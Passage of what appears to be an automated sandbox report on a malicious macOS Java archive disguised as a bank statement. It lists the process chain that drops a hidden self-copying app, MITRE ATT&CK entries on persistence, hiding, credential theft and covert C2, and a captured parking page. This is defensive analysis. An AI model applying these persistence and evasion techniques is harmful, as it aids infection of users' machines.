27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

System Behavior

Analysis Process: xpcproxy PID: 554 Parent PID: 1

General

Start time:	14:10:32
Start date:	22/07/2021
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	43488 bytes
MD5 hash:	d1bb9a4899f0af921e8188218b20d744

Chronological Activities

Analysis Process: Jar Launcher PID: 554 Parent PID: 1

General

Start time:	14:10:32
Start date:	22/07/2021
Path:	/System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher
Arguments:	/System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher
File size:	84272 bytes
MD5 hash:	fbf3f7600341147960760ba67d456816

Chronological Activities

Analysis Process: Jar Launcher PID: 555 Parent PID: 554

General

Start time:	14:10:32
Start date:	22/07/2021
Path:	/System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher
Arguments:	n/a
File size:	84272 bytes
MD5 hash:	fbf3f7600341147960760ba67d456816

Chronological Activities

Analysis Process: java PID: 555 Parent PID: 554

General

Start time:	14:10:32
Start date:	22/07/2021
Path:	/usr/bin/java
Arguments:	/usr/bin/java -jar /Users/berri/Desktop/Statement SKBMT 09818.jar
File size:	58336 bytes
MD5 hash:	f1ccfcbe272f38c2cdafba7a7ddfc5dc

Chronological Activities

Analysis Process: java PID: 555 Parent PID: 554

General

Start time:	14:10:32
Start date:	22/07/2021
Path:	/Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java
Arguments:	/usr/bin/java -jar /Users/berri/Desktop/Statement SKBMT 09818.jar
File size:	93520 bytes
MD5 hash:	1f2f4e0dc30c84d99d4d852fd4400c92

Chronological Activities

Analysis Process: jspawnhelper PID: 556 Parent PID: 555

General

Start time:	14:10:32
Start date:	22/07/2021
Path:	/Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/lib/jspawnhelper
Arguments:	n/a
File size:	14936 bytes
MD5 hash:	ee509c8c96f7766d54ab01a0605fe618

Chronological Activities

Analysis Process: kIbwf02l PID: 556 Parent PID: 555

General

Start time:	14:10:34
Start date:	22/07/2021
Path:	/Users/berri/kIbwf02l
Arguments:	/Users/berri/kIbwf02l
File size:	127808 bytes
MD5 hash:	a17bf4533d7ec677a0d4bdae19e41ff2

Chronological Activities

Analysis Process: sh PID: 557 Parent PID: 556

General

Start time:	14:10:34
Start date:	22/07/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Chronological Activities

Analysis Process: NBNlRBXH PID: 557 Parent PID: 556

General

Start time:	14:10:34
Start date:	22/07/2021
Path:	/Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH
Arguments:	/Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH
File size:	127808 bytes
MD5 hash:	a17bf4533d7ec677a0d4bdae19e41ff2

Chronological Activities

Analysis Process: xpcproxy PID: 558 Parent PID: 1

General

Start time:	14:10:34
Start date:	22/07/2021
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	43488 bytes
MD5 hash:	d1bb9a4899f0af921e8188218b20d744

Chronological Activities

Analysis Process: Preview PID: 558 Parent PID: 1

General

Start time:	14:10:34
Start date:	22/07/2021
Path:	/Applications/Preview.app/Contents/MacOS/Preview
Arguments:	/Applications/Preview.app/Contents/MacOS/Preview
File size:	2730352 bytes
MD5 hash:	14cc1485ead8fac8c80d49d481383f69

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. There are tools available to perform these changes.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in `/System/Library/LaunchAgents` , `/Library/LaunchAgents` , and `$HOME/Library/LaunchAgents` . These launch agents have property list files which point to the executables that will be launched . Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories . The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in . They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as `/Library/Preferences` (which execute with elevated privileges) and `~/Library/Preferences` (which execute with a user's privileges).
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may acquire credentials from web browsers by reading files specific to the target browser.Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.
Tactics:	Credential Access
Data Sources:	API monitoring, File monitoring, PowerShell logs, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

macOS Analysis Report Statement SKBMT 09818.jar

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

Dropped Files

Memory Dumps

Jbx Signature Overview

AV Detection:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Runtime Messages

Created / dropped Files

Static File Info

General

Archive ZIP

Archived Files

Extracted Files

Extracted File

Extracted File

Extracted File

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

System Behavior

Analysis Process: xpcproxy PID: 554 Parent PID: 1

General

Analysis Process: Jar Launcher PID: 554 Parent PID: 1

General

Analysis Process: Jar Launcher PID: 555 Parent PID: 554

General